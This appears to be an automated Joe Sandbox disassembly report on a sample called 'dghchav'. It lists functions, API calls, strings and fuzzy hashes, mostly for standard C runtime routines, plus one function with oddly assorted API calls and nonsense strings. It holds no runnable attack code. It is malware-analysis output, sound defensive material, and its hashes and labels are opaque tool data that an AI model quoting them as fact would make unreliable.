Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
API String ID: 3732613303-2259100434
Opcode ID: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
Instruction ID: 49f715d1ab0fd03b29b3072b70511d18e901dfbf6f68d4dbe0345dc55c82754a
Opcode Fuzzy Hash: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
Instruction Fuzzy Hash: 5F31A035C00611AAE710AF76ED0AE1B7EB4EB0AB51B10093BE450E22E0D73A8515CF9C

Function 00401659 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 127
librarytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
LoadLibraryA.KERNEL32(00000000), ref: 0040169B
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
GetLastError.KERNEL32 ref: 00401720
GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
LocalFlags.KERNEL32(00000000), ref: 00401782
RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
SetComputerNameA.KERNEL32(00000000), ref: 004017A2
InterlockedDecrement.KERNEL32(?), ref: 004017B5
LoadLibraryW.KERNEL32(0044DAB0), ref: 0040181C

Strings

jjjj, xrefs: 0040168B
jjj, xrefs: 004016E7
venogoricilagudofufoyiz, xrefs: 004016EF
hiramemepugatipowuzela, xrefs: 004016F4
{, xrefs: 00401759
u4j, xrefs: 0040167F
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 00401779

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: FileInterlockedLibraryLoadName$AttributesBreakCompareComputerConsoleDebugDecrementDiskEnvironmentErrorEventExceptionExchangeFlagsFreeInputLastLocalOpenPathRaiseReadShortSpaceStringTimeVariable
String ID: dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$hiramemepugatipowuzela$jjj$jjjj$u4j$venogoricilagudofufoyiz${
API String ID: 2963091761-1312479106
Opcode ID: e820062dd700b24326c586c3433f1f5ae17b31e7c30448c33e5fc95965b6c65e
Instruction ID: 378251b498804d731e0de826336589f14abb319e121f37aa39cfd513c37794a7
Opcode Fuzzy Hash: e820062dd700b24326c586c3433f1f5ae17b31e7c30448c33e5fc95965b6c65e
Instruction Fuzzy Hash: D1418C35A48314ABF720ABA1ED46B9A7770FB45B05F104439E705BB6E0CBF46811CBAD

Function 004033D0 Relevance: 10.6, APIs: 7, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(00443E2C,0040E290,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033E5
DecodePointer.KERNEL32(?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033F2
__realloc_crt.LIBCMT ref: 0040342F
__realloc_crt.LIBCMT ref: 00403445
EncodePointer.KERNEL32(00000000,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403457
EncodePointer.KERNEL32(?,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 0040346B
EncodePointer.KERNEL32(-00000004,?,?,?,004034D4,?,0043C5B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403473

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
Instruction ID: 2cb84a8a248f1c704ed31b969d410d2ae143d87c3ddf2eb88c20de984f4c0adb
Opcode Fuzzy Hash: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
Instruction Fuzzy Hash: 2711E972600215AFDB01AF76ED8085A7BEDFB51321310443BE945FB290EB75EE448B9C

Function 00404074 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd_noexit.LIBCMT ref: 0040407B

Part of subcall function 00405C14: GetLastError.KERNEL32(?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C18
Part of subcall function 00405C14: ___set_flsgetvalue.LIBCMT ref: 00405C26
Part of subcall function 00405C14: __calloc_crt.LIBCMT ref: 00405C3A
Part of subcall function 00405C14: DecodePointer.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C54
Part of subcall function 00405C14: __initptd.LIBCMT ref: 00405C63
Part of subcall function 00405C14: GetCurrentThreadId.KERNEL32 ref: 00405C6A
Part of subcall function 00405C14: SetLastError.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C82

__calloc_crt.LIBCMT ref: 0040409D
__get_sys_err_msg.LIBCMT ref: 004040BB
_strcpy_s.LIBCMT ref: 004040C3
__invoke_watson.LIBCMT ref: 004040D8

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00404088, 004040AB

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 69636372-798102604
Opcode ID: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
Instruction ID: 37372fcaa6264d988ca6bfe18943687c80e0c4479773ad4bbbf24e5db921d2ee
Opcode Fuzzy Hash: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
Instruction Fuzzy Hash: 29F0F0F260431067EA34392A5C8192B768CCBC0728B10483FFF09B72C2E93E9C4041EE

Function 00406BA3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00406BC4

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406BD5
__getptd.LIBCMT ref: 00406BE3

Strings

csm, xrefs: 00406BBD
RCC, xrefs: 00406BAF
MOC, xrefs: 00406BB6

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
Instruction ID: 8a2cd633cb2861bc694519b041e08bbf0c3c08e2df89b1e629200bcacebe9179
Opcode Fuzzy Hash: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
Instruction Fuzzy Hash: 8EE0E5711046149ED7209B65804576637A4EB48314F1640B7981EDF292E73CE8608E46

Function 00406E55 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CreateFrameInfo.LIBCMT ref: 00406E7D

Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403EC9
Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403ED7

__getptd.LIBCMT ref: 00406E87

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406E95
__getptd.LIBCMT ref: 00406EA3
__getptd.LIBCMT ref: 00406EAE
_CallCatchBlock2.LIBCMT ref: 00406ED4

Part of subcall function 00403F60: __CallSettingFrame@12.LIBCMT ref: 00403FAC

Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F8A
Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F98

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 497548b4a0f4d1d7c59b81f4b10d1b4968c17110556dba6785f250f817fe4740
Instruction ID: 976d35377cad4393233b57ce152850759acbe59ebf02f15ba6ab925de6b103ba
Opcode Fuzzy Hash: 497548b4a0f4d1d7c59b81f4b10d1b4968c17110556dba6785f250f817fe4740
Instruction Fuzzy Hash: CE11DA71C0470ADFEB00EFA5D445BAE7BB0FF08315F10806AF815A7291DB789A159F54

Function 00408388 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00408394

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__amsg_exit.LIBCMT ref: 004083B4
__lock.LIBCMT ref: 004083C4
InterlockedDecrement.KERNEL32(?), ref: 004083E1
_free.LIBCMT ref: 004083F4
InterlockedIncrement.KERNEL32(02142B00), ref: 0040840C

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 540c09528e981f4208a66600a514226a4fccadbf672c9552e231f3b896a7363d
Instruction ID: 26f866d3a9e4cffc16725e27c9f70bee2afc7b4430a3ddb1174e671c2c25d147
Opcode Fuzzy Hash: 540c09528e981f4208a66600a514226a4fccadbf672c9552e231f3b896a7363d
Instruction Fuzzy Hash: D201ED31A01A22DBC720AF26990634E7360FB84B15F00043FE854B72D2CF7C59009BDE

Function 00402160 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040217A

Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE

std::_Xinvalid_argument.LIBCPMT ref: 004021B7

Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 0040267B
Part of subcall function 00402666: __CxxThrowException@8.LIBCMT ref: 00402690
Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 004026A1

_memmove.LIBCMT ref: 00402218

Strings

string too long, xrefs: 004021B2
invalid string position, xrefs: 00402175

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 0281067812997500bad516e54b5411f9a50cb522d6cb345cee96c16d53027c68
Instruction ID: 7db026a3e821a4d026dc1f6adc6300752eb2c264efb36d1802d8374ad0edc79e
Opcode Fuzzy Hash: 0281067812997500bad516e54b5411f9a50cb522d6cb345cee96c16d53027c68
Instruction Fuzzy Hash: CA31C8323002109BD7219A9CEE84E5AF3A9EBA1764F20057FF541EB3C1D6F5DD4183A9

Function 00407202 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00407215

Part of subcall function 00407170: ___BuildCatchObjectHelper.LIBCMT ref: 004071A6

_UnwindNestedFrames.LIBCMT ref: 0040722C
___FrameUnwindToState.LIBCMT ref: 0040723A

Strings

csm, xrefs: 00407211, 00407226, 00407239, 00407257, 00407267
csm, xrefs: 00407204

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
Instruction ID: 9d33cda1630c614c6b8baaf9185435334ebf2647e1999c875cfe5a2f0f929500
Opcode Fuzzy Hash: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
Instruction Fuzzy Hash: EC014F35404109BBDF126F51CC45E9B3F6AFF08344F10402AFD18251A1D739E9B1DBA5

Function 00403938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00403952

Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C638,0000000C,0040580D), ref: 00404123

std::exception::exception.LIBCMT ref: 00403987
std::exception::exception.LIBCMT ref: 004039A1
__CxxThrowException@8.LIBCMT ref: 004039B2

Strings

,>D, xrefs: 00403965

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID: ,>D
API String ID: 1414122017-4267898978
Opcode ID: 8a6a3c7fa39abc12b2286a85d02748e85cfd0c5904dff70ea72f21ec95bbc5ae
Instruction ID: 9ed4f94ca6387e48f138287973f31bc1c86e6b6ed838834f4ce550f920102e7c
Opcode Fuzzy Hash: 8a6a3c7fa39abc12b2286a85d02748e85cfd0c5904dff70ea72f21ec95bbc5ae
Instruction Fuzzy Hash: EEF0D675800109AACB00FF56DC46A5D7F696B41B29B24443FF405B61D1CBF89B46974C

Function 0040354F Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040355D

Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C638,0000000C,0040580D), ref: 00404123

_free.LIBCMT ref: 00403570

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
Instruction ID: dc83b90e6fb43b5c24848a5f74a511594923413cb778fb3891e3a705d38e000c
Opcode Fuzzy Hash: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
Instruction Fuzzy Hash: E511C876810515BBCB213F76AC04A5A3F9C9F807A6B20483BF549BA2E0DA7C8B51D65C

Function 004080EC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004080F8

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 0040810F
__amsg_exit.LIBCMT ref: 0040811D
__lock.LIBCMT ref: 0040812D
__updatetlocinfoEx_nolock.LIBCMT ref: 00408141

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 20cb1fc732e579900c77d98cb4949e309b13dbbcb92f92c5b3ac46e1b7833a5a
Instruction ID: b4cc1c6424e82e2a622393a5b44b334ded5da7db2e5d8471cbe447a70042a561
Opcode Fuzzy Hash: 20cb1fc732e579900c77d98cb4949e309b13dbbcb92f92c5b3ac46e1b7833a5a
Instruction Fuzzy Hash: ECF0C232D04B00DAE620BB7A990270A2390DF00728F11413FE4947B2D2CF7C09018B9E

Function 0040AD75 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040AD9B

Part of subcall function 0040ABC7: __fltout2.LIBCMT ref: 0040ABF2

__cftog_l.LIBCMT ref: 0040ADC1
__cftoe_l.LIBCMT ref: 0040ADF3

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: ddfa4d8130d636f3ef40e1cea94614215a6fa8e11de1469be39291c4408a14f6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: D111433204024ABBCF125E85CC05CEE3F23BF18355B598526FA1869571D73BC9B1BB86

Function 004067DA Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00403AA0), ref: 004067DD
__malloc_crt.LIBCMT ref: 0040680C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406819

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
Instruction ID: c101f1b95c54b5ec221fdb71957a5b0ebd14c395316be2ddd09db82d21e96add
Opcode Fuzzy Hash: 4c2f1ac6bb7f8133571ce24b03f845ef82e5c12d60eed84597f6926d5cad50ed
Instruction Fuzzy Hash: 2DF0E977501010AADB207735BC4985B1668DAD532830B843BF506E7284F9388D5182A9

Function 00402060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004020D5
_memmove.LIBCMT ref: 00402126

Part of subcall function 00402160: std::_Xinvalid_argument.LIBCPMT ref: 0040217A

Strings

